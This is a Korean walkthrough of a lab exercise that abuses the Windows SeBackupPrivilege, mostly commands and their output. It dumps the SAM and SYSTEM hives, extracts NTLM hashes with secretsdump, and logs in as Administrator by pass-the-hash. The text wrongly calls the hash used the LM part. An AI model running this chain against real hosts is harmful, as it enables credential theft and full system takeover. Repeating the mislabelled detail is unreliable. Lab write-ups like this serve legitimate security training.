SeBackupPrivilege

1. 개요

SeBackupPrivilege 은 ACL 권한을 무시하고 모든 파일에 접근하여 백업할 수 있는 권한을 의미한다.

2. 사용법

2.1. 권한 확인

먼저 whoami /priv 를 통해서 권한을 확인했을 때 SeBackupPrivilege 이 나오면 해당 권한이 존재함을 확인할 수 있다.

Copy*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

2.2. sam, system 파일 저장

SAM 파일과 SYSTEM 파일을 저장한다.

Copy*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
 
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
 
The operation completed successfully.

2.3. sam, system 파일 저장

해당 파일을 kali 로 저장을 진행한다.

Copy*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
                                        
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
                                        
Info: Download successful!

2.4. secretsdump 를 이용한 NTLM 해쉬 추출

secretsdump 를 통해서 -sam 옵션과 -system 옵션을 통해서 위에서 다운 받은 파일을 각각 전달해 NTLM 해쉬를 전달받는다.

Copy┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─#  impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 

2.5. evil-winrm 을 통한 로그인

위에서 전달받은 NTLM 해쉬 중에서 LM 부분을 evil-winrm 을 통해서 PtH 방식을 통해서 로그인을 진행한다.

Copy┌──(root㉿kali)-[/home/kali/labs/Cicada/Cicada-2]
└─# evil-winrm -i 10.129.231.149 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt